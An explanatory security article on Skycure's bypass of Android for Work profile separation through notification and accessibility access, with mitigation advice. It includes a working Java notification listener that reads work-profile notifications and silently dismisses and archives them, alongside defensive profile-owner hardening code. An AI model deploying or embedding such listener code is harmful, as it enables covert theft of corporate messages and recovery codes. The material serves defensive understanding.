
Android sandboxing tools: How can work data separation be bypassed?

Android for Work's sandboxing tools, which split work and personal profiles, can be bypassed with a proof-of-concept attack. Expert Michael Cobb explains how the attack works.

Skycure Ltd. researchers demonstrated a proof-of-concept attack that can bypass Android for Work enterprise mobility management's sandboxing tools, which are designed to securely separate a work profile and a personal profile on Android devices. How does the attack work, and what are the possible risks?

BYOD programs are part of today's business model, but they introduce a variety of security risks. A big challenge for those enforcing security policies is finding a way to separate personal and corporate applications and data installed on employee-owned devices without violating the owner's privacy.

Unlike mobile device management (MDM) software, which controls the entire device and all its contents, containerization technologies can balance the security needs of the enterprise with the demands of its users by segregating business and personal data. Corporate data is stored in containers, establishing a clear division between what is and is not subject to a corporate security policy.

Containerization and sandboxing tools, such as Android for Work, Apple iOS Managed Apps and Samsung Knox, are often used as a complement to or even as a replacement for MDM controls.

Android for Work's sandboxing tools, the work profile, arrived in Android 5.0 Lollipop; Google has since dropped the separate brand and treats the work profile as a standard feature of the Android operating system. A work profile is a separately managed profile on the device with business-level controls, while the personal profile stays open, neither managed nor monitored by enterprise administrators. The two profiles isolate applications, network settings and storage from each other, so an app installed in the personal profile cannot access activity or content in the work profile.

Researchers from the mobile threat defense company Skycure discovered two flaws in the separation logic of Android for Work sandboxing tools that enable a malicious personal app to silently view, steal and manipulate content in the work profile.

By default, work profile notifications and app icons have a red briefcase on them so they can be distinguished from personal apps. However, notifications access is a device-level permission, and Skycure found that a malicious app in the personal profile can acquire permission to view and take action on all notifications, including work notifications.

By using social engineering to trick a user into granting a malicious app notifications access permission, an attacker can send any information contained in work notifications, such as video conference login details and email messages, to a command-and-control server.

This app-in-the-middle attack could also be used to covertly read password recovery emails: the malicious app reads the notification, dismisses it and then triggers the notification's archive action through the Android notification listener API, so the user never sees the message. No additional permission is needed for this, because notification access is granted as a single capability: an app that can read notifications can also dismiss them and fire the action buttons attached to them.
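The following listener, an added example and not Skycure's proof-of-concept or any code from the original article, shows why this works: notification access is a device-level capability, so a listener installed in the personal profile receives work-profile notifications in the same callback as personal ones. The only thing that distinguishes them is the UserHandle on the StatusBarNotification. The class name, package name and the "Archive" action label are assumptions; the manifest fragment in the comment is what any notification listener needs, and the user still has to enable it under Settings > Notification access, which is the social-engineering step described above.

```java
import android.app.Notification;
import android.app.PendingIntent;
import android.os.Bundle;
import android.os.Process;
import android.service.notification.NotificationListenerService;
import android.service.notification.StatusBarNotification;
import android.util.Log;

import java.util.ArrayList;
import java.util.List;

/*
 * Hypothetical personal-profile app (added example). Manifest entry required for any listener:
 *
 *   <service android:name=".WorkNotificationSpy"
 *            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
 *       <intent-filter>
 *           <action android:name="android.service.notification.NotificationListenerService" />
 *       </intent-filter>
 *   </service>
 *
 * Nothing in this declaration is scoped to a profile: once the user toggles notification
 * access on, the system binds the service for every notification on the device.
 */
public class WorkNotificationSpy extends NotificationListenerService {
    private static final String TAG = "WorkNotificationSpy";

    // Label of the action button the listener fires after reading a message (assumption:
    // the mail client exposes an "Archive" action on its message notifications).
    private static final String ARCHIVE_ACTION_LABEL = "Archive";

    // Stand-in for the command-and-control channel: captured content is only collected here.
    private final List<String> captured = new ArrayList<>();

    @Override
    public void onNotificationPosted(StatusBarNotification sbn) {
        // Work-profile notifications carry the managed profile's UserHandle; personal ones
        // carry the handle of the user this service runs as.
        boolean fromWorkProfile = !sbn.getUser().equals(Process.myUserHandle());
        if (!fromWorkProfile) {
            return;
        }

        Notification n = sbn.getNotification();
        Bundle extras = n.extras;
        CharSequence title = extras.getCharSequence(Notification.EXTRA_TITLE);
        CharSequence text = extras.getCharSequence(Notification.EXTRA_TEXT);
        CharSequence bigText = extras.getCharSequence(Notification.EXTRA_BIG_TEXT);

        // This is the content the article describes leaking: sender, subject and body
        // preview of work email, meeting details, one-time codes in recovery emails.
        String record = sbn.getPackageName() + " | " + title + " | "
                + (bigText != null ? bigText : text);
        captured.add(record);
        Log.d(TAG, "work notification: " + record);

        // Hide the evidence: dismiss the notification, then trigger the app's own
        // "Archive" action so the message disappears from the inbox view as well.
        cancelNotification(sbn.getKey());
        fireAction(n, ARCHIVE_ACTION_LABEL);
    }

    // Fires the PendingIntent behind the action button whose label matches. The intent
    // runs with the work app's identity, which is why no extra permission is required.
    private void fireAction(Notification n, String label) {
        if (n.actions == null) {
            return;
        }
        for (Notification.Action action : n.actions) {
            if (action.title != null && label.contentEquals(action.title)) {
                try {
                    action.actionIntent.send();
                } catch (PendingIntent.CanceledException e) {
                    Log.w(TAG, "action '" + label + "' no longer valid", e);
                }
                return;
            }
        }
    }

    // Exposed so the captured records can be inspected (a real attacker would post them
    // to a command-and-control server instead).
    public List<String> getCaptured() {
        return new ArrayList<>(captured);
    }
}
```

The check to take away from this: on a device where work notifications must stay inside the work profile, review Settings > Notification access and treat every enabled third-party listener as having full read and act access to work content, regardless of which profile it was installed in.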

The second attack vector is a vulnerability in Android's accessibility service, which provides features like audible narration of onscreen text. The service has read and write access to virtually all content and controls on a device, so a malicious app installed in the personal profile that acquires accessibility permissions could gain access to apps and data in the work profile, again circumventing the secure separation that Android for Work sandboxing tools are meant to enforce. IT administrators can't detect if sensitive information is being stolen, as they don't have access to a user's personal profile.

Both attack techniques rely on social engineering to dupe users into installing a malicious app and then granting it notification access or accessibility access. Security awareness training should familiarize users with the typical tactics used by social engineers and should emphasize the importance of installing only apps created by well-established vendors from the Google Play Store, and of refusing notification or accessibility access to apps that have no obvious need for it. Users should also be encouraged to run the latest Android operating system, as Marshmallow (6.x) prevents the abuse of the draw-over-apps feature that some attackers have used to trick users into granting permissions without their knowledge.
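User training is the only control the article names, but a profile owner (the EMM agent that manages the work profile) can also restrict the two capabilities both attacks depend on. The following is an added example, not code from the article or from any EMM product, and assumes a hypothetical EMM agent package com.example.emm whose DeviceAdminReceiver is the profile owner of the work profile. It uses two real DevicePolicyManager calls: setPermittedAccessibilityServices (API 21, Lollipop), which per the API documentation applies to all profiles of the user when set by a profile owner, so a non-system accessibility service in the personal profile that is not on the list cannot be enabled; and setPermittedCrossProfileNotificationListeners (API 26, Android 8.0, so not yet released when this article was published), which stops personal-profile notification listeners from receiving work-profile notifications at all.

```java
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Context;
import android.os.Build;

import java.util.Arrays;
import java.util.Collections;
import java.util.List;

/*
 * Hypothetical profile-owner hardening (added example). Assumes com.example.emm is
 * the profile owner of the work profile, e.g. set up during managed provisioning or,
 * on a test device, with "adb shell dpm set-profile-owner".
 */
public final class WorkProfileHardening {
    private static final ComponentName ADMIN = new ComponentName(
            "com.example.emm", "com.example.emm.WorkProfileAdminReceiver");

    // Accessibility services that remain usable, by package name. An empty list allows
    // only built-in system services; null removes the restriction entirely. TalkBack is
    // listed here so that screen-reader users are not locked out (assumption: that is the
    // only third-party service this organization needs).
    private static final List<String> ALLOWED_ACCESSIBILITY_PACKAGES =
            Arrays.asList("com.google.android.marvin.talkback");

    // Personal-profile packages whose notification listeners may see work notifications.
    // Empty: only system listeners (the system UI itself) receive them.
    private static final List<String> ALLOWED_CROSS_PROFILE_LISTENERS =
            Collections.<String>emptyList();

    private WorkProfileHardening() {
    }

    /**
     * Applies both restrictions. Returns false if the caller is not the profile owner or
     * if either call is rejected; setPermittedAccessibilityServices in particular returns
     * false when a non-system service that is already enabled is missing from the list,
     * so a false result here must be surfaced to the administrator rather than ignored.
     */
    public static boolean apply(Context ctx) {
        DevicePolicyManager dpm =
                (DevicePolicyManager) ctx.getSystemService(Context.DEVICE_POLICY_SERVICE);
        if (dpm == null || !dpm.isProfileOwnerApp(ADMIN.getPackageName())) {
            return false;
        }

        // Blocks the second attack vector: a personal-profile app not on this list cannot
        // be enabled as an accessibility service, so it cannot read or drive work apps.
        boolean ok = dpm.setPermittedAccessibilityServices(ADMIN, ALLOWED_ACCESSIBILITY_PACKAGES);

        // Blocks the first attack vector, but only on Android 8.0 (API 26) and later.
        // Older devices have no policy for this, which is why the article's advice to
        // run the latest OS and to refuse notification access matters on them.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
            ok &= dpm.setPermittedCrossProfileNotificationListeners(
                    ADMIN, ALLOWED_CROSS_PROFILE_LISTENERS);
        }
        return ok;
    }

    /** Current accessibility allow-list as seen by the platform, for auditing; null means unrestricted. */
    public static List<String> currentAccessibilityAllowList(Context ctx) {
        DevicePolicyManager dpm =
                (DevicePolicyManager) ctx.getSystemService(Context.DEVICE_POLICY_SERVICE);
        return dpm.getPermittedAccessibilityServices(ADMIN);
    }
}
```

One caveat a practitioner should keep in mind: the accessibility restriction is the stronger of the two because it exists on every Lollipop-and-later device, but it also blocks legitimate assistive services not on the list, so the allow-list needs to be agreed with users who depend on them before it is rolled out.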

Next Steps

Learn about the Android for Work security improvements in Android Nougat

Find out how the Linux kernel memory features protect Android devices

Discover the differences between software containers and sandboxes

This was last published in July 2017
